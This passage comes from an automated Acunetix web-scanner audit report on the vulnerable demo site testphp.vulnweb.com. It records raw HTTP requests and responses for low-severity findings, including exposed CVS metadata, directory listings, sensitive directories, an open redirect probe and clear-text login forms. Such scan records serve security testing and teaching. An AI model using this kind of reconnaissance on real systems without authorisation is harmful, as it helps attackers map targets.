Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:45:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

CVS files found Severity Low Type Validation Reported by module Directory checks Description

Impact

Recommendation

Affected items /CVS/Entries Details Request GET /CVS/Entries HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:56:14 GMT Content-Type: text/plain Content-Length: 1 Last-Modified: Wed, 11 May 2011 10:27:48 GMT Connection: close ETag: "4dca64a4-1" Accept-Ranges: bytes /CVS/Repository Details Request GET /CVS/Repository HTTP/1.0 Accept: */* Acunetix Website Audit

238

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:56:14 GMT Content-Type: text/plain Content-Length: 8 Last-Modified: Wed, 11 May 2011 10:27:48 GMT Connection: close ETag: "4dca64a4-8" Accept-Ranges: bytes /CVS/Root Details Request GET /CVS/Root HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:56:14 GMT Content-Type: text/plain Content-Length: 1 Last-Modified: Wed, 11 May 2011 10:27:48 GMT Connection: close ETag: "4dca64a4-1" Accept-Ranges: bytes

Directory listing found Severity Low Type Information Reported by module Text search Description

Impact

Acunetix Website Audit

239

Recommendation

Affected items /admin Details

Request GET /admin/ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com:80/admin/ Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 09:01:51 GMT Content-Type: text/html Connection: close /CVS Details

Request GET /CVS/ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 09:01:50 GMT Content-Type: text/html Connection: close

Acunetix Website Audit

240

/Flash Details

Request GET /Flash/ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:38 GMT Content-Type: text/html Connection: close /images Details

Request GET /images/ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:38 GMT Content-Type: text/html Connection: close /Mod_Rewrite_Shop/images Details

Request GET /Mod_Rewrite_Shop/images/ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Acunetix Website Audit

241

Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:41 GMT Content-Type: text/html Connection: close

Hidden form input named price was found Severity Low Type Informational Reported by module Crawler Description

Impact

Recommendation

Affected items /product.php Details

Request GET /product.php?pic=6 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

242

/product.php Details

Request GET /product.php?pic=4 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /product.php Details

Request GET /product.php?pic=2 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /product.php Details

Request GET /product.php?pic=3 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Acunetix Website Audit

243

Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /product.php Details

Request GET /product.php?pic=5 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /product.php Details

Request GET /product.php?pic=7 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit

244

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /product.php Details

Request GET /product.php?pic=1 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/search.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Possible sensitive directories Severity Low Type Validation Reported by module Directory checks Description

Impact

Recommendation

Affected items /admin Details Request GET /admin HTTP/1.0 Accept: */* Acunetix Website Audit

245

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 301 Moved Permanently Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:56:26 GMT Content-Type: text/html Content-Length: 184 Location: http://testphp.vulnweb.com/admin/ Connection: close /secured Details Request GET /secured HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 301 Moved Permanently Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:56:22 GMT Content-Type: text/html Content-Length: 184 Location: http://testphp.vulnweb.com/secured/ Connection: close

Possible sensitive files Severity Low Type Validation Reported by module Directory checks Description

Impact

Recommendation

Affected items

Acunetix Website Audit

246

/hpp/test.php Details Request GET /hpp/test.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:57:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

URL redirection Severity Low Type Validation Reported by module Parameter manipulation Description

Impact

Recommendation

Affected items /redir.php Details Request GET /redir.php?r=http://www.acunetix.com HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response Acunetix Website Audit

247

HTTP/1.1 302 Moved Temporarily Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:49:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Location: http://www.acunetix.com

User credentials are sent in clear text Severity Low Type Informational Reported by module Crawler Description

Impact

Recommendation

Affected items /login.php Details Request GET /login.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /signup.php Details Request GET /signup.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix Website Audit

248

Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/login.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Broken links Severity Informational Type Informational Reported by module Crawler Description

Impact

Recommendation

Affected items /Mod_Rewrite_Shop/Details/color-printer/3 Details Request GET /Mod_Rewrite_Shop/Details/color-printer/3/ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 404 Not Found Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:41 GMT Content-Type: text/html Content-Length: 570 Connection: close /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 Details

Acunetix Website Audit

249

Request GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 404 Not Found Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:41 GMT Content-Type: text/html Content-Length: 570 Connection: close /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 Details Request GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/ Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 404 Not Found Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:41 GMT Content-Type: text/html Content-Length: 570 Connection: close /privacy.php Details Request GET /privacy.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Acunetix Website Audit

250

Referer: http://testphp.vulnweb.com/login.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 404 Not Found Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Email address found Severity Informational Type Informational Reported by module Text search Description

Impact

Recommendation

Affected items / Details

Request GET / HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

251

/artists.php Details

Request GET /artists.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Cookie: login=test%2Ftest Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/login.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /artists.php Details

Request GET /artists.php?artist=3 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/artists.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /artists.php Details

Request Acunetix Website Audit

252

GET /artists.php?artist=1 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/artists.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /artists.php Details

Request GET /artists.php?artist=2 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/artists.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /cart.php Details

Request POST /cart.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 19 Connection: Close Acunetix-Aspect: enabled Acunetix Website Audit

253

Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/product.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /cart.php Details

Request POST /cart.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 20 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/product.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /cart.php Details

Request POST /cart.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 19 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/product.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

254

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /cart.php Details

Request POST /cart.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 19 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/product.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /cart.php Details

Request POST /cart.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 21 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/product.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Acunetix Website Audit

255

Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:42 GMT Content-Type: text/html Connection: close /cart.php Details

Request POST /cart.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 19 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/product.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /cart.php Details

Request POST /cart.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 21 Connection: Close Acunetix-Aspect: enabled Acunetix-Aspect-Password: ***** Pragma: no-cache Acunetix-aspect-queries: filelist;aspectalerts Referer: http://testphp.vulnweb.com/product.php Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:34:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

256

/cart.php Details

